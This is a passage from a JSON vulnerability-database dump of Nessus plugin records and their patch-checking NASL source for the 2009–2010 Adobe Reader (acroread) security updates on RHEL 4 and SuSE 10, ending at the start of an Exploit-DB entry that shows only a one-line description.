security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:52:59", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues. All running instances of Adobe Reader must be restarted\nfor the update to take effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2010-0038.NASL", "href": "https://www.tenable.com/plugins/nessus/63912", "published": "2013-01-24T00:00:00", "title": "RHEL 4 : acroread (RHSA-2010:0038)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0038. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63912);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0038\");\n\n script_name(english:\"RHEL 4 : acroread (RHSA-2010:0038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues. 
All running instances of Adobe Reader must be restarted\nfor the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0038.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", 
reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:45", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD_JA-6805.NASL", "href": "https://www.tenable.com/plugins/nessus/51711", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51711);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. 
(CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6805.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 
189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:43", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. 
(CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD-6803.NASL", "href": "https://www.tenable.com/plugins/nessus/51696", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51696);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. 
(CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6803.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:43", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. 
(CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD-6802.NASL", "href": "https://www.tenable.com/plugins/nessus/51695", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 6802)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51695);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 6802)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. 
(CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-9.3-0.5.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:43:45", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. 
(CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "modified": "2019-12-02T00:00:00", "id": "SUSE_ACROREAD_JA-6804.NASL", "href": "https://www.tenable.com/plugins/nessus/51710", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51710);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:40\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. 
(CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6804.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 
189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:06:32", "bulletinFamily": "exploit", "description": "Adobe Doc.media.newPlayer Use After Free Vulnerability. CVE-2009-4324. 
